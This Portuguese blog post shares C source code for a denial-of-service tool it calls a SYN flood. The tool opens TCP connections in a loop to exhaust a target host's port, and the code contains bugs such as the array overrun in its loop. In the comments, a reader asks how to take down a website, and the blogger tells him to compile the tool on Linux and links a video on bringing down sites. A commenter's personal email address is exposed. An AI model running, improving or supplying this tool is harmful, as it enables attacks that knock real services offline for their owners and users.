[Fonte] Ferramenta para SYN Flood

Esta aqui um Código Fonte de uma ferramenta muito boa para fazer SYN Flood. Espero que gostem:

/* Fast and simple syn flooder,
* also known as swiss army wire for smothering🙂
* This tool represents how to make simple DoS attack
* with simple coded code🙂
*
* Use this tool for education purposes only!
*
* n: Muris Kurgas
* e: jorganwd [at] gmail [dot] com
* w: http://www.jorgan.users.cg.yu
* i: irc.freenode.net \ #remote-exploit \ j0rgan
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#define mns 1020
/* You may have to change the maximum open sockets (mns) */
#define mnc 50
/* You may have to change this also:
* Maximum number of tries to connect,
* very useful if you want to force connecting,
* for example cisco router on telnet port,
* which allowes only few🙂
*/
int main(int argc, char *argv[]) {
if(argc < 3) {
printf(“Gimme: %s <host> <port>\n”, argv[0]);
exit(-1);
}
int sock[mns];
int c;
int i;
c=0;
struct sockaddr_in dest[mns];
struct hostent *host;
if((host = gethostbyname(argv[1])) == -1) {
printf(“Can’t resolve %s! Misspelled address?\n”, argv[1]);
exit(-1);
}

for(i = 0; i <= mns; i++) {
if((sock[i] = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf(“What happen?! I can’t create socket! \n”);
exit(-1);
}

dest[i].sin_family = AF_INET;
dest[i].sin_port = htons(atoi(argv[2]));
dest[i].sin_addr = *((struct in_addr *)host->h_addr);

if(connect(sock[i], (struct sockaddr *)&dest[i], sizeof(struct sockaddr)) == -1) {
printf(“I can’t connect to %s on port %s! Are you connected? :)\n Trying again in one second! To stop press ctrl+c\n”, argv[1], argv[2]);
c++;
if (c == mnc) {
printf(“Tired of connecting, try again…\n”); exit (-1);
}
}
printf(“Connected No: %d\n”, i);
}
return(0);
}

/* EOF */

  1. Olá cara tudo blzz, queria que vc explicasse como derrubar um site pelo synflooder.
    então vamus lá 1° queria saber todas ferramentas necessarias para utilizar como pacotes, bibliotecas que faltam, e os progamas e como usa-los.blz

    Me ajuda ai cara blzzz
    valeuu
    Mandar resposta por Email (rafael_machado3133@hotmail.com)
    Obrigado

  2. Ta blzz cara eu jah li o seu tutorial, mas é o seguinte, eu entendi tudo oque tava lá, ou seja, estava somente explicando os comandos para efetuar no ms-dos certo!
    Só que eu queria saber qual progama para compilar eu devo baixar , eu tava pensando no MinGW do windows xp; eu tenho ele instalado na minha máquina so que na hora de compilar aparece no dos synflooder.c: No such file or directory
    no input files.
    então deve ta faltano bibliotecas, queriia que vc me disesse qual biblioteca esta faltano!!
    Outra coisa cara depois de baixar o arquivo synflooder onde devo colocar ??
    vc pode me enviar a resposta por email (rafael_machado3133@hotmail.com)

    se vc puder me mandar explicando passo a passo eu agradeço valeww!!

    aguardo respostas blz

      • Neuroexplo
      • 19 março, 2010

      Oi Rafael….não é no MS-DOS não….estas ferramentas não são próprias pra Windows.
      Você tem que usar um linux e usa o compilador GCC….

      Eu te recomendo o Ubuntu 9.10 ou o Fedora 12 (ambos são ótimos)

      Pelo fato de estas ferramentas serem de natureza da plataforma Linux, não posso garantir que elas irão funcionar perfeitamente sendo compiladas no Windows

      E pra você entender melhor como o ataque é feito olha esta vídeo aula que eu fiz explicando como usar esta ferramenta:
      https://wordsecurity.wordpress.com/2009/07/31/videoderrubando-sites-syn-flood-e-hping/

  3. A blzz então,agora me explica ai cara como eu instalo o fedora eu jah baixei no proprio site do fedora. ele ta em winrar parece que não tem instalador dentro das pastas me ajuda ai blzz!!

      • Neuroexplo
      • 21 março, 2010

      Amigo…já esta fugindo o assunto do post…mas no google tem como instalar..não tem segredo.
      abraços

  1. No trackbacks yet.

Deixe uma resposta

